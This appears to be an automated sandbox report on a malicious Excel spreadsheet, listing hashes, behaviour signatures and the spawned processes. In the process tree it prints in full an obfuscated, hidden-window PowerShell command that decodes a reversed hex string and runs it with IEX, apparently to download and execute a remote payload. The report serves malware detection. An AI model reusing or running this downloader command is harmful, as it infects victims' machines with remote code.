Analysis

  • max time kernel
    67s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 06:26

General

  • Target

    96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls

  • Size

    440KB

  • MD5

    06278f61fb1e92e3f197930234fa6eb8

  • SHA1

    34b83031b8bcbfeb820fa65a09f6e480a4f430b0

  • SHA256

    96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c

  • SHA512

    ffaa4f467e3b1669ad589342cede512cedd727c78ea70fe366c2b42482260db0dd54bce99471fb52c422f7795c3b7361e7ce5b754b6507debbaf1d6625120556

  • SSDEEP

    6144:Qk3hOdsylKlgxopeiBNhZF+E+W2kdAsoCbk1cVVXVKJKYWX36lvpxtZcEfz0/B9D:FhZh3cpFL0/WuYzqD0VlU9Z

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2372
  • C:\Windows\system32\CMD.exe
    CMD /c start /min Powershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1512

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1512-29-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

  • memory/1512-30-0x0000000001E80000-0x0000000001E88000-memory.dmp

    Filesize

    32KB

  • memory/2372-23-0x00000000007E0000-0x00000000008E0000-memory.dmp

    Filesize

    1024KB

  • memory/2372-22-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-16-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-12-0x00000000007E0000-0x00000000008E0000-memory.dmp

    Filesize

    1024KB

  • memory/2372-21-0x00000000007E0000-0x00000000008E0000-memory.dmp

    Filesize

    1024KB

  • memory/2372-24-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-1-0x00000000723BD000-0x00000000723C8000-memory.dmp

    Filesize

    44KB

  • memory/2372-17-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-4-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2372-31-0x00000000723BD000-0x00000000723C8000-memory.dmp

    Filesize

    44KB

  • memory/2372-32-0x0000000006B50000-0x0000000006C50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-33-0x0000000006D50000-0x0000000006E50000-memory.dmp

    Filesize

    1024KB

  • memory/2372-34-0x00000000007E0000-0x00000000008E0000-memory.dmp

    Filesize

    1024KB